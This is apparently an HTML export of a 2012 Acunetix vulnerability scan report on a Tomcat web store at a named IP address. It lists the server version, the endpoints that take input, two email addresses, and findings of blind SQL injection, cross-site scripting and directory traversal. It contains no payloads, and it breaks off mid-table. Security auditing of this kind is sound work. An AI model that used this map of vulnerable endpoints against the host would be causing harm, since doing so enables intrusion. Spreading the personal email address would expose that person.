<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name=Generator content="FastReport 4.0 http://www.fast-report.com">

<title>WVSSingleScan</title>
<style type="text/css"><!-- 
.page_break {page-break-before: always;}
.s0 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 text-align: Left; vertical-align: Top;
}
.s1 {
 font-family: Arial;
 font-size: 24px;
 color: #FFFFFF; font-weight: bold; font-style: normal;
 background-color: #1E7BC1;
 text-align: Right; vertical-align: Middle;
}
.s2 {
 font-family: Arial;
 font-size: 35px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Center; vertical-align: Top;
}
.s3 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: transparent;
 text-align: Right; vertical-align: Top;
}
.s4 {
 font-family: Arial;
 font-size: 13px;
 color: #FFFFFF; font-weight: bold; font-style: normal;
 background-color: #3399FF;
 text-align: Center; vertical-align: Middle;
}
.s5 {
 font-family: Arial;
 font-size: 21px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s6 {
 font-family: Arial;
 font-size: 13px;
 color: #FFFFFF; font-weight: bold; font-style: normal;
 background-color: #808080;
 border-color:#808080; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s7 {
 font-family: Arial;
 font-size: 16px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s8 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s9 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s10 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s11 {
 font-family: Arial;
 font-size: 13px;
 color: #FFFFFF; font-weight: bold; font-style: normal;
 background-color: #808080;
 border-color:#808080; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s12 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s13 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s14 {
 font-family: Arial;
 font-size: 13px;
 color: #FF0000; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s15 {
 font-family: Arial;
 font-size: 13px;
 color: #F18900; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s16 {
 font-family: Arial;
 font-size: 13px;
 color: #2C65C8; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s17 {
 font-family: Arial;
 font-size: 13px;
 color: #2D952D; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s18 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #DC3016;
 border-color:#DC3016; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s19 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #F18900;
 border-color:#F18900; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s20 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #2C65C8;
 border-color:#2C65C8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s21 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #2D952D;
 border-color:#2D952D; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s22 {
 font-family: Courier New;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: transparent;
 text-align: Right; vertical-align: Top;
}
.s23 {
 font-family: Courier New;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Right; vertical-align: Top;
}
.s24 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s25 {
 font-family: Arial;
 font-size: 16px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s26 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Top;
}
.s27 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 0px;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s28 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 0px;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s29 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: transparent;
 border-color:#808080; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 1;
 border-bottom-width: 0px;
 text-align: Left; vertical-align: Top;
}
.s30 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s31 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s32 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s33 {
 font-family: Arial;
 font-size: 13px;
 color: #000080; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s34 {
 font-family: Arial;
 font-size: 21px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s35 {
 font-family: Arial;
 font-size: 16px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 text-align: Left; vertical-align: Middle;
}
.s36 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s37 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s38 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s39 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 1;
 border-bottom-width: 0px;
 text-align: Left; vertical-align: Top;
}
.s40 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: transparent;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s41 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s42 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: #C0C0C0;
 border-color:#CCCCCC; border-style: solid;
 border-left-width: 0px;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s43 {
 font-family: Courier New;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s44 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#808080; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 1;
 border-bottom-width: 0px;
 text-align: Left; vertical-align: Top;
}
.s45 {
 font-family: Arial;
 font-size: 1px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#C0C0C0; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 1;
 border-bottom-width: 0px;
 text-align: Left; vertical-align: Top;
}
.s46 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s47 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 0px;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s48 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 0px;
 border-top-width: 0px;
 border-bottom-width: 0px;
 text-align: Left; vertical-align: Top;
}
.s49 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-weight: bold; font-style: normal;
 background-color: #FFFFFF;
 text-align: Left; vertical-align: Middle;
}
.s50 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s51 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s52 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s53 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 0px;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s54 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 0px;
 border-right-width: 1;
 border-top-width: 1;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s55 {
 font-family: Arial;
 font-size: 13px;
 color: #000080; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s56 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 0px;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Top;
}
.s57 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #E4E4E4;
 border-color:#D8D8D8; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
.s58 {
 font-family: Arial;
 font-size: 13px;
 color: #000000; font-style: normal;
 background-color: #FFFFFF;
 border-color:#E4E4E4; border-style: solid;
 border-left-width: 1;
 border-right-width: 1;
 border-top-width: 0px;
 border-bottom-width: 1;
 text-align: Left; vertical-align: Middle;
}
--></style>
</head>
<body
 bgcolor="#FFFFFF" text="#000000">
<a name="PageN1"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:18px">
<td colspan="7" rowspan="2" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img0.jpg" width="152" height="26" alt=""></td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td colspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img1.jpg" width="333" height="20" alt=""></td>
</tr>
<tr style="height:6px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:315px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:175px">
<td colspan="14" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img2.jpg" width="365" height="181" alt=""></td><td colspan="5" class="s1">Acunetix Website Audit<br><br>22 January, 2012</td>
</tr>
<tr style="height:117px">
<td colspan="19" class="s2">Detailed Scan Report</td>
</tr>
<tr style="height:367px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s3">Generated by Acunetix WVS Reporter (v7.0 Build 20111005)</td>
</tr>
</table>
<a name="PageN2"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:33px">
<td colspan="19" class="s5">Scan of http://134.154.14.153:8080/yuliana/</td>
</tr>
<tr style="height:15px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:22px">
<td colspan="19" class="s7">Scan details</td>
</tr>
<tr style="height:18px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s6">Scan information</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s8">Starttime</td><td colspan="13" class="s9">1/22/2012 1:45:38 AM</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Finish time</td><td colspan="13" class="s51">1/22/2012 1:50:56 AM</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Scan time</td><td colspan="13" class="s52">5 minutes, 19 seconds</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Profile</td><td colspan="13" class="s51">Default</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s11">Server information</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s8">Responsive</td><td colspan="13" class="s9">True</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Server banner</td><td colspan="13" class="s51">Apache-Coyote/1.1</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Server OS</td><td colspan="13" class="s51">Unknown</td>
</tr>
<tr style="height:18px">
<td colspan="6" class="s50">Server technologies</td><td colspan="13" class="s51" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:26px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Threat level</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:76px">
<td colspan="8" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img3.jpg" width="173" height="79" alt=""></td><td colspan="11" rowspan="2" class="s13">Acunetix Threat Level 3 <br>One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these vulnerabilities and compromise the backend database and/or deface your website.</td>
</tr>
<tr style="height:2px">
<td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:22px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Alerts distribution</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td/><td colspan="5" class="s24">Total alerts found</td><td colspan="3" class="s23">111</td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td colspan="2" rowspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img4.jpg" width="17" height="17" alt=""></td><td/><td rowspan="4" class="s14">High</td><td colspan="3" rowspan="4" class="s22">52</td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td colspan="3" class="s18" style="font-size:1px">&nbsp;</td><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:3px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td colspan="2" rowspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img5.jpg" width="17" height="17" alt=""></td><td/><td rowspan="4" class="s15">Medium</td><td colspan="3" rowspan="4" class="s22">0</td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:3px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td colspan="2" rowspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img6.jpg" width="17" height="17" alt=""></td><td/><td rowspan="4" class="s16">Low</td><td colspan="3" rowspan="4" class="s22">9</td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td class="s20" style="font-size:1px">&nbsp;</td><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:3px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:4px">
<td/><td/><td colspan="2" rowspan="3" class="s0" style="font-size:1px"><img src="WVSSingleScan0225.files/img7.jpg" width="17" height="17" alt=""></td><td/><td rowspan="4" class="s17">Informational</td><td colspan="3" rowspan="4" class="s22">50</td><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td colspan="2" class="s21" style="font-size:1px">&nbsp;</td><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:3px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:29px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:22px">
<td colspan="19" class="s25">Knowledge base</td>
</tr>
<tr style="height:7px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">Apache Tomcat version</td>
</tr>
<tr style="height:19px">
<td colspan="19" class="s13">Apache Tomcat version: 6.0.16 .</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">List of file extensions</td>
</tr>
<tr style="height:156px">
<td colspan="19" class="s13">File extensions can provide information on what technologies are being used on this website.<br>List of file extensions detected:<br><br><br>css =&gt; 1 file(s)<br>jpg =&gt; 1 file(s)<br>jsp =&gt; 4 file(s)<br>pdf =&gt; 2 file(s)<br>ico =&gt; 1 file(s)</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">List of files with inputs</td>
</tr>
<tr style="height:120px">
<td colspan="19" class="s13">These files have at least one input (GET or POST).<br><br><br>/yuliana/user/validation/j_security_check - 1  inputs<br>/yuliana/user/review/addReview - 1  inputs<br>/yuliana/user/order/displayUserCart - 1  inputs<br>/yuliana/user/account/updateUserPassword - 1  inputs</td>
</tr>
<tr style="height:18px">
<td colspan="17" class="s26">Acunetix Website Audit</td><td colspan="2" class="s3">2</td>
</tr>
</table>
<a name="PageN3"></a>
<table width="718" border="0" cellspacing="0" cellpadding="0" class="page_break">
<tr style="height: 1px"><td width="4"/><td width="11"/><td width="8"/><td width="8"/><td width="7"/><td width="94"/><td width="19"/><td width="21"/><td width="25"/><td width="11"/><td width="20"/><td width="92"/><td width="5"/><td width="37"/><td width="2"/><td width="22"/><td width="256"/><td width="8"/><td width="68"/></tr>
<tr style="height:37px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:19px">
<td colspan="19" class="s4">Generated with Acunetix WVS evaluation edition (not for commercial use)</td>
</tr>
<tr style="height:172px">
<td colspan="19" class="s13">/yuliana/user/account/updateUserDetails - 1  inputs<br>/yuliana/registration/processUser - 1  inputs<br>/yuliana/validation/passwordRecovery - 1  inputs<br>/yuliana/cart/displayCart - 2  inputs<br>/yuliana/cart/removeCartItem - 1  inputs<br>/yuliana/cart/setQuantity - 1  inputs<br>/yuliana/catalog/displayProduct - 1  inputs<br>/yuliana/partners/displayParnerLetter - 2  inputs<br>/yuliana/email/join_email_list.jsp - 1  inputs<br>/yuliana/email/addToEmailList - 1  inputs</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">List of external hosts</td>
</tr>
<tr style="height:110px">
<td colspan="19" class="s13">These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts allowed.(Settings-&gt;Scanners settings-&gt;Scanner-&gt;List of hosts allowed).<br><br><br>localhost <br>www.example.com</td>
</tr>
<tr style="height:18px">
<td colspan="19" class="s12">List of email addresses</td>
</tr>
<tr style="height:94px">
<td colspan="19" class="s13">List of all email addresses found on this host.<br><br><br>m_julia1@yahoo.com <br>test@test.com</td>
</tr>
<tr style="height:15px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:22px">
<td colspan="19" class="s7">Alerts summary</td>
</tr>
<tr style="height:11px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img8.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Blind SQL Injection</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN6">/yuliana/user/account/updateUserDetails</a></td><td class="s54">1</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img9.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Cross Site Scripting</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s33"><a href="#PageN8">/yuliana/email/addToEmailList</a></td><td class="s54">3</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN28">/yuliana/registration/processUser</a></td><td class="s56">45</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s55"><a href="#PageN29">/yuliana/user/account/updateUserDetails</a></td><td class="s56">2</td>
</tr>
<tr style="height:1px">
<td colspan="19" class="s29" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:10px">
<td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/><td/>
</tr>
<tr style="height:1px">
<td colspan="19" class="s44" style="font-size:1px">&nbsp;</td>
</tr>
<tr style="height:21px">
<td colspan="3" class="s46" style="font-size:1px"><img src="WVSSingleScan0225.files/img10.jpg" width="24" height="24" alt=""></td><td colspan="16" class="s47">Directory Traversal</td>
</tr>
<tr style="height:18px">
<td colspan="18" class="s30">Affects</td><td class="s53">Variations</td>
</tr>
